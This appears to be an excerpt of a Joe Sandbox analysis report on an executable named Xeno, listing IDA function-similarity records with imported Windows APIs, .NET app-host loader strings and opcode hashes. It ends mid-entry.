                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__acrt_iob_func$DebugOutputStringSwitchThread__stdio_common_vsnwprintf_s__stdio_common_vswprintf_invalid_parameter_noinfo_noreturnfputwcfputws
                                                                                      • String ID: 74e592c2fa383d4a3960714caef0c4f2$The managed DLL bound to this executable could not be retrieved from the executable image.$The managed DLL bound to this executable is: '%s'$This executable is not bound to a managed DLL to execute. The binding value is: '%s'$XenoUI.dll$c3ab8ff13720e8ad9047dd39466b3c89
                                                                                      • API String ID: 804575459-2944702120
                                                                                      • Opcode ID: ec0c915271d4d2f5bd3cd1049913cce54fa24223ccabbab7e11f737cf6f4db4f
                                                                                      • Instruction ID: 792bffb538eacdcb9c088430d987443ef112af9d8b73464c229213b2e3baa461
                                                                                      • Opcode Fuzzy Hash: ec0c915271d4d2f5bd3cd1049913cce54fa24223ccabbab7e11f737cf6f4db4f
                                                                                      • Instruction Fuzzy Hash: D7511261B18A81C5EB20AF25E5001B96391FF48BC0F44153BDE5D97B99EF7CEA49C321
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$ErrorHandleLastLibraryLoadModule
                                                                                      • String ID: Failed to load the dll from [%s], HRESULT: 0x%X$Failed to pin library [%s] in [%s]$Loaded library from %s$pal::load_library
                                                                                      • API String ID: 2518456378-4234151505
                                                                                      • Opcode ID: 922d6f426139b8e99b942e8ef66e00f144c712bddc2d8eb17f78f43507c79a88
                                                                                      • Instruction ID: 378becf0a49b1d1290404cd0c309e9503ff6a0f6c44853e1e195d01ef91afaad
                                                                                      • Opcode Fuzzy Hash: 922d6f426139b8e99b942e8ef66e00f144c712bddc2d8eb17f78f43507c79a88
                                                                                      • Instruction Fuzzy Hash: D661A1A2F14A12C8FF00AB65D4502FD23A1BF04B95F94513BDE5DA6A98FF78D489C321
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$AddressCurrentLibraryLoadProcProcessSwitchThread__stdio_common_vfwprintffputwc
                                                                                      • String ID: Call to IsWow64Process2 failed: %u$Could not load 'kernel32.dll': %u$IsWow64Process2$kernel32.dll
                                                                                      • API String ID: 1662406701-4196934218
                                                                                      • Opcode ID: 2a196a475a1ef3129848e97716497868948c1f0ec471aac66cc9e033bbd63ac5
                                                                                      • Instruction ID: c4566bb208a16fbc0ffd4fa0bbade9d6e4e07a845988d3bd4cb13800ee9359b2
                                                                                      • Opcode Fuzzy Hash: 2a196a475a1ef3129848e97716497868948c1f0ec471aac66cc9e033bbd63ac5
                                                                                      • Instruction Fuzzy Hash: B5115215F09A42C2EF50AB11E8402A523A1FF88B81F44503BDD4DCA358FE7CE10DC722
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: terminate$Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 695522112-393685449
                                                                                      • Opcode ID: f28acaadb3c49b9303a4fb65d60bb45bbab11cab4959214b783e81408c66f729
                                                                                      • Instruction ID: 9d7e9f04bc370c270b5c7caef05b8322d9c0b38445931f5e9e712deb86f5c229
                                                                                      • Opcode Fuzzy Hash: f28acaadb3c49b9303a4fb65d60bb45bbab11cab4959214b783e81408c66f729
                                                                                      • Instruction Fuzzy Hash: D0E19072908682CAF720DF64D4442AD3BA0FF45788F14413ADE8DDB696EF78E589C712
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: invalid stoul argument$stoul argument out of range
                                                                                      • API String ID: 0-1365241121
                                                                                      • Opcode ID: e70d4fe1e4e8372d666b61306ebc1a38f3a2c9116e0c00419a925fb0b016ee5e
                                                                                      • Instruction ID: b5fbe54b587932aa4e2d5c30b8d2c5bec54d7b6e601f87f3762bb2a5f82a2a53
                                                                                      • Opcode Fuzzy Hash: e70d4fe1e4e8372d666b61306ebc1a38f3a2c9116e0c00419a925fb0b016ee5e
                                                                                      • Instruction Fuzzy Hash: 09B1C262F04A51D5EB10AB76C4402BC23A1BF44BA4F55063BDE2E977D4EF78E849C362
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Process$CurrentEnvironmentErrorLastVariableWow64toupper
                                                                                      • String ID: DOTNET_ROOT$DOTNET_ROOT(x86)$DOTNET_ROOT_
                                                                                      • API String ID: 2548692714-2596692933
                                                                                      • Opcode ID: 6dfc282151492951d4be0e1921aac29ae8c702ebc842023ab1fe9f72c852e54d
                                                                                      • Instruction ID: cd7a34d95f9bc02b9b17dbb00e39b86df4ea1ee07fcfe0c4caf2c405c40c99ee
                                                                                      • Opcode Fuzzy Hash: 6dfc282151492951d4be0e1921aac29ae8c702ebc842023ab1fe9f72c852e54d
                                                                                      • Instruction Fuzzy Hash: DE71E762E08A41C1EA10AB15D54037D2761FF85BE4F84463BDE5D87AD5EF7CE188C352
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                      • API String ID: 667068680-1247241052
                                                                                      • Opcode ID: 37bc658b66a3ee2dc263f53ce1848975e34876866f8e2a8c49aafa1a62849c2a
                                                                                      • Instruction ID: a9dad86bf17861e20bce0d2f1783d3a6bf7231e401646dd834ba4601789fc823
                                                                                      • Opcode Fuzzy Hash: 37bc658b66a3ee2dc263f53ce1848975e34876866f8e2a8c49aafa1a62849c2a
                                                                                      • Instruction Fuzzy Hash: 5DF0DA64E09F07C1EA008B61B8544A02365FF08B91F40403ACC2E8A360FFBCA19DD722
                                                                                      APIs
                                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68D5E8204
                                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68D5E823B
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68D5E8249
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68D5E82D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentVariable$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                      • String ID: DOTNET_RUNTIME_ID$Failed to read environment variable [%s], HRESULT: 0x%X$win-x64
                                                                                      • API String ID: 1438037791-340911207
                                                                                      • Opcode ID: afcabb24bc793c5cd4695cc977daa818da5e7fa2d766a58c4012187ef9e1bece
                                                                                      • Instruction ID: b4bf05766ca9e1f7944b85166c5b3ca95e794c36a172930bb2efc171c0afb7e2
                                                                                      • Opcode Fuzzy Hash: afcabb24bc793c5cd4695cc977daa818da5e7fa2d766a58c4012187ef9e1bece
                                                                                      • Instruction Fuzzy Hash: 7541C821A18B82C1E6109B26E84026A6361FF85BD0F44523BEE9D97B95EF7CE188C711
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4BC1
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4BCF
                                                                                      • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4BE8
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4BF9
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4C67
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4C73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 916704608-2084034818
                                                                                      • Opcode ID: f9b9bc4cd250af293ed6bb77090b9453b9b5a735e3b41d4d1f8e3331029902ce
                                                                                      • Instruction ID: edac18a2984aceb3c2af8795b2e737f8bdf3c5b29aa2dab442bc06fd10fedcd9
                                                                                      • Opcode Fuzzy Hash: f9b9bc4cd250af293ed6bb77090b9453b9b5a735e3b41d4d1f8e3331029902ce
                                                                                      • Instruction Fuzzy Hash: 0131D221A1AA42D1EE15AB46E4006792295FF44B64F49193ADD1D9F780FEBCE448C722
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentVariable_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskErrorLast
                                                                                      • String ID: Did not find [%s] directory [%s]$Failed to read environment variable [%s], HRESULT: 0x%X
                                                                                      • API String ID: 4061399417-4112875940
                                                                                      • Opcode ID: d81a996b1cb7a28f5bf7b380b0923397d70d43b5237310d7261fa3eaa4562c9b
                                                                                      • Instruction ID: 93afda93bf6c1fa5ceb17765c0cc49aa68cec99d02a2ada89351c46b3c5f54cb
                                                                                      • Opcode Fuzzy Hash: d81a996b1cb7a28f5bf7b380b0923397d70d43b5237310d7261fa3eaa4562c9b
                                                                                      • Instruction Fuzzy Hash: AB51FA62A18641D1EB20EF15E4002AE6761FF88BD4F84423BEE9E87795EF7CD448C751
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF68D5E6070: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E6195
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9B08
                                                                                        • Part of subcall function 00007FF68D5F0D08: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E1BAF), ref: 00007FF68D5F0D22
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9B6C
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9BAB
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E9BEB
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E9BF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$malloc
                                                                                      • String ID:
                                                                                      • API String ID: 3700908427-0
                                                                                      • Opcode ID: cb6097c60cf60780d18170efc2a8bd56a44369b06fadb145ad7da12436b509b1
                                                                                      • Instruction ID: a084b0ded541f7dd3e6d19d9e7ce0a065b950b41515d2102200f9de68590d69d
                                                                                      • Opcode Fuzzy Hash: cb6097c60cf60780d18170efc2a8bd56a44369b06fadb145ad7da12436b509b1
                                                                                      • Instruction Fuzzy Hash: 9D91F362E18B42C1EA10EB55E44476D62A5FF447A0F44473AEEAD83BC4EF7CE088C711
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF68D5E6070: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E6195
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9E61
                                                                                        • Part of subcall function 00007FF68D5F0D08: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E1BAF), ref: 00007FF68D5F0D22
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9EC4
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9F03
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E9F43
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E9F49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$malloc
                                                                                      • String ID:
                                                                                      • API String ID: 3700908427-0
                                                                                      • Opcode ID: 33a1df6c60be62bd28c6420927faa5315ee236f923c388ab469a260e4dad78c3
                                                                                      • Instruction ID: 42139b84dcd78c420c4e24ee5cf87240d74295e5d7f84cd3f8bc294d74348f71
                                                                                      • Opcode Fuzzy Hash: 33a1df6c60be62bd28c6420927faa5315ee236f923c388ab469a260e4dad78c3
                                                                                      • Instruction Fuzzy Hash: EB91C772A18B41C1EA10AB65E40036962A1FF447A4F50473AEEBD47BD9EF7CE489C711
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                      • String ID:
                                                                                      • API String ID: 2081738530-0
                                                                                      • Opcode ID: cf4ad1e47728b8125e5964b361a826ce27b6b385610bb5944a91feb1556dffc9
                                                                                      • Instruction ID: 0c7dcb4cb487f07aefbb19e648f463d3f1d811c4b798d2ae1edf84e0204a8002
                                                                                      • Opcode Fuzzy Hash: cf4ad1e47728b8125e5964b361a826ce27b6b385610bb5944a91feb1556dffc9
                                                                                      • Instruction Fuzzy Hash: C1316B26A08A46C1EE15AB16E4401B963A0FF94BD4F18453BDE4EC76A5FF7CF849C321
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2889003569-2084237596
                                                                                      • Opcode ID: 6f2db744ac662fd3d70d451773660cb5a32c88955c90cc972c90a3d241b120de
                                                                                      • Instruction ID: dd143fb8a561131277958ae51153ea15129682be35bb36520c3c09a0970c1958
                                                                                      • Opcode Fuzzy Hash: 6f2db744ac662fd3d70d451773660cb5a32c88955c90cc972c90a3d241b120de
                                                                                      • Instruction Fuzzy Hash: A9918F73A08781CAF710DB65E8402AD7BA0FB44788F14413AEE8D9BB55EF78D199CB11
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEFDA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                      • String ID: %sApp: %sArchitecture: %sApp host version: %s.NET location: %sLearn more:https://aka.ms/dotnet/app-launch-failedDownload$8.0.8$You must install or update .NET to run this application.$x64
                                                                                      • API String ID: 3668304517-1341214489
                                                                                      • Opcode ID: a92fa66e97e0067d9ff6593ca37c29cb84103f00721856d305cb6c5e94c01af7
                                                                                      • Instruction ID: 86385c4afb06451287386f9a675e5f2bdd2b1928bf36112a1978c514ee4c613d
                                                                                      • Opcode Fuzzy Hash: a92fa66e97e0067d9ff6593ca37c29cb84103f00721856d305cb6c5e94c01af7
                                                                                      • Instruction Fuzzy Hash: 7021C871A18A42C0EA00DB15F48016D6361FF457D4F50113BEEAC87699EF7CE54CC361
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalefreemallocstd::locale::_
                                                                                      • String ID:
                                                                                      • API String ID: 2400387105-0
                                                                                      • Opcode ID: 2a6e0c499abe03c911e9eab8a3518031c7cc19002d42f36788c5138a79854d2f
                                                                                      • Instruction ID: 6b34e0cd98388c09dee49d366352ca5efe619ea12d4e20d37c2b6012c5c19def
                                                                                      • Opcode Fuzzy Hash: 2a6e0c499abe03c911e9eab8a3518031c7cc19002d42f36788c5138a79854d2f
                                                                                      • Instruction Fuzzy Hash: 79216D21A08A86C5EB14AB15D44477967A0FF44F84F5C403ADE0D8B765EF7CE889C311
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: __acrt_iob_funcfflush$SwitchThread
                                                                                      • String ID:
                                                                                      • API String ID: 2569594562-0
                                                                                      • Opcode ID: 632681c2061b277c5d70717be25f9f4338a33d6bc708ea27c4336cf21d4a4ca7
                                                                                      • Instruction ID: 8686471205c42f804b43d533a7070c0441d145bd9d3bacb1e5133d648c594c83
